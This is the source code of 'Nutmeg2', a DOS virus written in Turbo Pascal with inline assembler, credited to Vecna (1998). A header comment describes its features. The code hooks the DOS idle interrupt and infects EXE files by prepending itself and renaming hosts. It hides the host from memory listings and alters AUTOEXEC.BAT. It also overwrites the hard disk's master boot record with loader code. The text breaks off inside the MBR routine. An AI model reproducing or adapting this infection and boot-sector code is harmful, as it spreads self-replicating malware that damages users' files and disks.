{
  [Nutmeg2]
  Turbo Pascal Multipartite EXE/MBR infector
  Copyright 1998 (c) Vecna

  This is the first known virus written in an HLL that also infects the MBR.
  It infects the owner of the environment on each interrupt 0x28 call, which
  is issued when DOS is idle. The virus places itself at the start of the
  infected file, adding 4096 bytes to it. It is a prepender that re-executes
  the host, but under the original name, so if the host program goes memory
  resident, MEM.EXE does not show a foreign program as resident. It also has
  the so-called "host stealth", infecting all files, including those with
  self-checks. Two external assembler routines give the virus its
  multipartite ability. The virus is packed with LZEXE and replicates in
  this form. Two big ugly buffers are used as temporary storage when copying
  files and when working on the MBR. As the file is packed, these large
  memory areas do not increase the file length, although they occupy memory.
}

{$F+}
{$S-}
{$M 8192,0,0}

PROGRAM NUTMEG;

USES DOS;

CONST
  VIRSIZE=4096;

TYPE
  BUFFER=ARRAY[0..VIRSIZE - 1] OF CHAR;

VAR
  HANDLE:WORD;
  ENVSEG:WORD;
  ENVOFF:WORD;
  PSPSEG:WORD;
  FILENAME:STRING[128];
  MYNAME:STRING[128];
  OLDNAME:STRING[128];
  MYPARAMS:STRING[128];
  VIRBUFFER:BUFFER;
  AEXEC:BOOLEAN;

PROCEDURE GETSEGMENTS; ASSEMBLER;
ASM
  MOV AH, 51H
  INT 21H
  MOV ES, BX
  MOV ES, ES:[2CH]
  MOV ENVSEG, ES
  MOV PSPSEG, BX
END;

PROCEDURE FSEEK(POINTER:WORD); ASSEMBLER;
ASM
  MOV AX, 4200H
  MOV BX, HANDLE
  XOR CX, CX
  MOV DX, POINTER
  INT 21H
END;

PROCEDURE READFILE(VAR FILEBUF:BUFFER; READNUM:WORD); ASSEMBLER;
ASM
  PUSH DS
  MOV AH, 3FH
  MOV BX, HANDLE
  MOV CX, READNUM
  LDS DX, FILEBUF
  INT 21H
  POP DS
END;

PROCEDURE WRITEFILE(FILEBUF:BUFFER; WRITENUM:WORD); ASSEMBLER;
ASM
  PUSH DS
  MOV AH, 40H
  MOV BX, HANDLE
  MOV CX, WRITENUM
  LDS DX, FILEBUF
  INT 21H
  POP DS
END;

PROCEDURE OPENFILE(FILENAME:STRING; ACCESS:BYTE); ASSEMBLER;
ASM
  PUSH DS
  MOV AH, 3DH
  MOV AL, ACCESS
  LDS DX, FILENAME
  INC DX
  INT 21H
  MOV HANDLE, AX
  POP DS
END;

PROCEDURE ERASEFILE(FILENAME:STRING); ASSEMBLER;
ASM
  PUSH DS
  MOV AH, 41H
  LDS DX, FILENAME
  INC DX
  INT 21H
  POP DS
END;

PROCEDURE CLOSEFILE; ASSEMBLER;
ASM
  MOV AH, 3EH
  MOV BX, HANDLE
  INT 21H
END;

PROCEDURE CREATENEWFILE(FILENAME:STRING; ATTRIBUTES:WORD); ASSEMBLER;
ASM
  PUSH DS
  MOV AH, 3CH
  MOV CX, ATTRIBUTES
  LDS DX, FILENAME
  INC DX
  INT 21H
  MOV HANDLE, AX
  POP DS
END;

PROCEDURE RENAMEFILE(SOURCE:STRING;DESTINATION:STRING); ASSEMBLER;
ASM
  PUSH DS
  MOV AH, 56H
  LDS DX, SOURCE
  INC DX
  LES DI, DESTINATION
  INC DI
  INT 21H
  POP DS
END;

PROCEDURE COPYTO(DESTINATION:STRING; SOURCE:STRING; STARTAT:WORD); ASSEMBLER;
VAR
  HANDLE1,HANDLE2:WORD;
ASM
  PUSH DS
  MOV AX,3D00H
  LDS DX,SOURCE
  INC DX
  INT 21H
  MOV HANDLE1, AX
  MOV AX,3D02H
  LDS DX,DESTINATION
  INC DX
  INT 21H
  MOV HANDLE2, AX
  MOV AX, 4200H
  MOV BX, HANDLE1
  XOR CX, CX
  MOV DX, STARTAT
  INT 21H
  MOV AX, 4202H
  MOV BX, HANDLE2
  XOR CX, CX
  CWD
  INT 21H
  PUSH CS
  POP DS
  MOV DX, OFFSET @BUFFER
@NEXTCHUNK:
  MOV AH, 3FH
  MOV BX, HANDLE1
  MOV CX, 16*64*4
  INT 21H
  MOV CX, AX
  MOV AH, 40H
  MOV BX, HANDLE2
  INT 21H
  CMP AX, 16*64*4
  JE @NEXTCHUNK
  MOV AH, 3EH
  MOV BX, HANDLE1
  INT 21H
  MOV AH, 3EH
  MOV BX, HANDLE2
  INT 21H
  JMP @EXIT
@BUFFER:
  DB 00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00
  DB 00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00
  DB 00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00
  DB 00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00
  DB 00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00
  DB 00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00
  DB 00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00
  DB 00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00
  DB 00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00
  DB 00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00
  DB 00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00
  DB 00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00
  DB 00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00
  DB 00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00
  DB 00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00
  DB 00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00
  DB 00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00
  DB 00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00
  DB
00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00 DB 00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00 DB 00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00 DB 00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00 DB 00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00 DB 00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00 DB 00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00 DB 00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00 DB 00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00 DB 00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00 DB 00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00 DB 00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00 DB 00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00 DB 00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00 DB 00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00 DB 00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00 DB 00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00 DB 00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00 DB 00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00 DB 00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00 DB 00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00 DB 00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00 DB 00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00 DB 00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00 DB 00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00 DB 00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00 DB 00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00 DB 00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00 DB 00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00 DB 00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00 DB 00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00 DB 00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00 DB 00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00 DB 00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00 DB 00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00 DB 00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00 DB 00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00 DB 00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00 DB 00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00 DB 
00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00 DB 00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00 DB 00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00 DB 00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00 DB 00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00 DB 00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00 DB 00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00 DB 00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00 DB 00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00 DB 00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00 DB 00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00 DB 00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00 DB 00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00 DB 00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00 DB 00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00 DB 00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00 DB 00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00 DB 00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00 DB 00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00 DB 00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00 DB 00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00 DB 00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00 DB 00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00 DB 00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00 DB 00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00 DB 00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00 DB 00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00 DB 00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00 DB 00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00 DB 00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00 DB 00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00 DB 00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00 DB 00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00 DB 00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00 DB 00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00 DB 00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00 DB 00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00 DB 00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00 DB 00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00 DB 
00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00 DB 00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00 DB 00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00 DB 00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00 DB 00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00 DB 00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00 DB 00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00 DB 00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00 DB 00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00 DB 00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00 DB 00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00 DB 00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00 DB 00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00 DB 00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00 DB 00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00 DB 00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00 DB 00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00 DB 00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00 DB 00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00 DB 00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00 DB 00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00 DB 00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00 DB 00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00 DB 00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00 DB 00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00 DB 00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00 DB 00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00 DB 00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00 DB 00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00 DB 00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00 DB 00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00 DB 00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00 DB 00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00 DB 00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00 DB 00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00 DB 00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00 DB 00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00 DB 00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00 DB 00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00 DB 
00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00 DB 00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00 DB 00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00 DB 00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00 DB 00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00 DB 00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00 DB 00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00 DB 00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00 DB 00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00 DB 00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00 DB 00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00 DB 00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00 DB 00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00 DB 00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00 DB 00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00 DB 00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00 DB 00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00 DB 00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00 DB 00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00 DB 00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00 DB 00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00 DB 00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00 DB 00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00 DB 00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00 DB 00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00 DB 00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00 DB 00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00 DB 00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00 DB 00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00 DB 00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00 DB 00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00 DB 00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00 DB 00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00 DB 00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00 DB 00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00 DB 00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00 DB 00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00 DB 00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00 DB 00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00 DB 
00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00 DB 00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00 DB 00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00 DB 00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00 DB 00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00 DB 00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00 DB 00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00 DB 00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00 DB 00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00 DB 00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00 DB 00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00 DB 00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00 DB 00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00 DB 00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00 DB 00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00 DB 00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00 DB 00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00 DB 00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00 DB 00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00 DB 00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00 DB 00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00 DB 00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00 DB 00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00 DB 00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00 DB 00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00 DB 00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00 DB 00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00 DB 00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00 DB 00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00 DB 00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00 DB 00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00 DB 00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00 DB 00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00 DB 00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00 DB 00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00 DB 00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00 DB 00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00 DB 00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00 DB 00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00 DB 
00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00 DB 00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00 DB 00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00 DB 00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00 DB 00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00 DB 00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00 DB 00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00 DB 00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00 DB 00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00 DB 00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00 DB 00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00 DB 00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00 DB 00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00 DB 00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00 DB 00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00 DB 00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00 DB 00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00 DB 00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00 DB 00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00 DB 00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00 DB 00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00 DB 00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00 DB 00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00 DB 00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00 DB 00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00 DB 00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00 DB 00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00 DB 00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00 DB 00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00 DB 00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00 DB 00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00 DB 00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00 DB 00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00 DB 00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00 DB 00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00 DB 00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00 DB 00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00 DB 00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00 DB 00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00 DB 
  00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00
  DB 00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00
  DB 00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00
  DB 00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00
  DB 00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00
  DB 00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00
@EXIT:
  POP DS
END;

FUNCTION RANDOMNAME: STRING;

  FUNCTION POELETRA(QTAS:CHAR): STRING;
  VAR
    CH:CHAR;
    TEMP:STRING[12];
  BEGIN
    TEMP:='';
    REPEAT
      CH:=CHR(65+RANDOM(25));
      TEMP:=TEMP+CH;
    UNTIL TEMP[0]=QTAS;
    POELETRA:=TEMP;
  END;

BEGIN
  RANDOMNAME:=POELETRA(#8)+'.'+POELETRA(#3)+#0;
END;

PROCEDURE PSPOWNER;
BEGIN
  ENVOFF:=0;
  FILENAME:='';
  GETSEGMENTS;
  REPEAT
    ENVOFF:=ENVOFF+1;
  UNTIL MEMW[ENVSEG:ENVOFF]=$00;
  ENVOFF:=ENVOFF+4;
  REPEAT
    FILENAME:=FILENAME+CHR(MEM[ENVSEG:ENVOFF]);
    ENVOFF:=ENVOFF+1;
  UNTIL MEM[ENVSEG:ENVOFF-1]=$00;
END;

PROCEDURE VIRUSINT28; INTERRUPT;

  PROCEDURE INFECTEXE;
  VAR
    NEWNAME:STRING[128];
    WHERESLASH:WORD;
    OK:BYTE;
  BEGIN
    OK:=0;
    ASM
      PUSH DS
      MOV AX, SEG FILENAME
      MOV DS, AX
      MOV SI, OFFSET FILENAME
      MOV DX, SI
      INC DX
      MOV AX, 4300H
      INT 21H
      JC @TERMINATED
      CMP CX, 1
      JE @TERMINATED
      XOR CX, CX
    @SEARCHSLASH:
      INC SI
      INC CX
      CMP BYTE PTR DS:[SI], 0
      JE @TERMINATED
      CMP BYTE PTR DS:[SI], '\'
      JNE @SEARCHSLASH
      MOV WHERESLASH, CX
      MOV OK, 1
      JMP @SEARCHSLASH
    @TERMINATED:
      POP DS
    END;
    IF OK=1 THEN
    BEGIN
      NEWNAME:=COPY(FILENAME,1,WHERESLASH)+RANDOMNAME;
      RENAMEFILE(FILENAME,NEWNAME);
      CREATENEWFILE(FILENAME,0);
      WRITEFILE(VIRBUFFER,VIRSIZE);
      CLOSEFILE;
      COPYTO(FILENAME,NEWNAME,0);
      ERASEFILE(NEWNAME);
    END;
    ASM
      PUSH DS
      MOV AX, SEG FILENAME
      MOV DS, AX
      MOV DX, OFFSET FILENAME
      INC DX
      MOV AX, 4301H
      MOV CX, 1
      INT 21H
      POP DS
    END;
  END;

BEGIN
  PSPOWNER;
  IF NOT(OLDNAME=FILENAME) THEN
  BEGIN
    IF (FILENAME[LENGTH(FILENAME)-1]='E') THEN INFECTEXE;
    OLDNAME:=FILENAME;
  END;
END;

PROCEDURE INITALL;
VAR
  COUNT:BYTE;
BEGIN
  AEXEC:=TRUE;
  RANDOMIZE;
  PSPOWNER;
  MYNAME:=FILENAME;
  OPENFILE(MYNAME,0);
  READFILE(VIRBUFFER,VIRSIZE);
  CLOSEFILE;
  IF PARAMSTR(1)='!'
  THEN
  BEGIN
    ASM
      PUSH DS
      PUSH CS
      POP DS
      CALL @GETNAME
      DB 'AUTOEXEC.BAT', 0
    @GETNAME:
      POP DX
      MOV AX, 3D02H
      INT 21H
      JC @ECA
      XCHG AX, BX
      MOV AX, 4202H
      MOV CX, -1
      MOV DX, -19
      INT 21H
      MOV AH, 40H
      XOR CX, CX
      INT 21H
      MOV AH, 3EH
      INT 21H
      MOV AX, SEG MYNAME
      MOV DS, AX
      MOV DX, OFFSET MYNAME
      INC DX
      MOV AX, 4301H
      XOR CX, CX
      INT 21H
      JC @ECA
      MOV AH, 41H
      INT 21H
    @ECA:
      POP DS
    END;
    AEXEC:=FALSE;
  END;
  FOR COUNT:=1 TO PARAMCOUNT DO
    MYPARAMS:=MYPARAMS+PARAMSTR(COUNT)+' ';
END;

PROCEDURE SPAWNHOST;
VAR
  NEWNAME:STRING[128];
  INF, OUTF:FILE;
  ATTR:WORD;
BEGIN
  IF AEXEC=TRUE THEN
  BEGIN
    ASM
      PUSH DS
      MOV AX, SEG MYNAME
      MOV DS, AX
      MOV DX, OFFSET MYNAME
      INC DX
      MOV AX, 4300H
      INT 21H
      MOV ATTR, CX
      MOV AX, 4301H
      XOR CX, CX
      INT 21H
      POP DS
    END;
    NEWNAME:=RANDOMNAME;
    RENAMEFILE(MYNAME,NEWNAME);
    CREATENEWFILE(MYNAME,2);
    CLOSEFILE;
    COPYTO(MYNAME,NEWNAME,VIRSIZE);
    SWAPVECTORS;
    EXEC(MYNAME, MYPARAMS);
    SWAPVECTORS;
    ERASEFILE(MYNAME);
    RENAMEFILE(NEWNAME,MYNAME);
    ASM
      PUSH DS
      MOV AX, SEG MYNAME
      MOV DS, AX
      MOV DX, OFFSET MYNAME
      INC DX
      MOV AX, 4301H
      MOV CX, ATTR
      INT 21H
      MOV AX, SEG NEWNAME
      MOV DS, AX
      MOV DX, OFFSET NEWNAME
      INC DX
      MOV AX, 4301H
      XOR CX, CX
      INT 21H
      MOV AH, 41H
      INT 21H
      POP DS
    END;
  END;
END;

FUNCTION RESIDENT:BOOLEAN;
VAR
  IVT:LONGINT;
BEGIN
  IVT:=MEML[$0:$350];
  IF IVT=$20FF20FF THEN RESIDENT:=TRUE ELSE RESIDENT:=FALSE;
END;

PROCEDURE MLOADER; EXTERNAL; {$L MLOADER.OBJ}
PROCEDURE LOADER; EXTERNAL; {$L LOADER.OBJ}

PROCEDURE INFECTMBR;
BEGIN
  ASM
    PUSH DS
    PUSH CS
    POP ES
    PUSH CS
    POP DS
    MOV AH, 08H
    MOV DX, 0080H
    INT 13H
    AND CX, 00111111B
    CMP CL, ((VIRSIZE+511)/512)+6
    JB @OVERBUFFER
    MOV AX, 0201H
    MOV CX, 0001H
    MOV BX, OFFSET @BUFFER
    MOV DX, 0080H
    INT 13H
    JC @OVERBUFFER
    MOV DI, BX
    MOV SI, OFFSET MLOADER
    MOV AX, WORD PTR [SI]
    CMP WORD PTR [DI], AX
    JE @OVERBUFFER
    MOV AX, 0301H
    MOV CX, 0002H
    INT 13H
    JC @OVERBUFFER
    MOV CX, OFFSET LOADER
    SUB CX, OFFSET MLOADER
    CLD
    REP MOVSB
    MOV AX, 0301H
    MOV CX, 0001H
    MOV DX, 0080H
    INT 13H
    JC @OVERBUFFER
    MOV AX, 0302H
    MOV CX, 0003H
    MOV BX, OFFSET LOADER
    MOV DX, 0080H
    INT 13H
    JC @OVERBUFFER
    MOV BX, OFFSET VIRBUFFER
    MOV AX, SEG VIRBUFFER
    MOV ES, AX
    MOV AX, 300H+((VIRSIZE+511)/512)
    MOV CX, 0005H
    INT 13H
    JMP @OVERBUFFER
  @BUFFER:
    DB 00, 00, 00, 00, 00, 00, 00, 00, 00, 00, 00, 00, 00, 00, 00, 00
    DB 00, 00, 00, 00, 00, 00, 00, 00, 00, 00, 00, 00, 00, 00, 00, 00
    DB 00, 00, 00, 00, 00, 00, 00, 00, 00, 00, 00, 00, 00, 00, 00, 00
    DB 00, 00, 00, 00, 00, 00, 00, 00, 00, 00, 00, 00, 00, 00, 00, 00
    DB 00, 00, 00, 00, 00, 00, 00, 00, 00, 00, 00, 00, 00, 00, 00, 00
    DB 00, 00, 00, 00, 00, 00, 00, 00, 00, 00, 00, 00, 00, 00, 00, 00
    DB 00, 00, 00, 00, 00, 00, 00, 00, 00, 00, 00, 00, 00, 00, 00, 00
    DB 00, 00, 00, 00, 00, 00, 00, 00, 00, 00, 00, 00, 00, 00, 00, 00
    DB 00, 00, 00, 00, 00, 00, 00, 00, 00, 00, 00, 00, 00, 00, 00, 00
    DB 00, 00, 00, 00, 00, 00, 00, 00, 00, 00, 00, 00, 00, 00, 00, 00
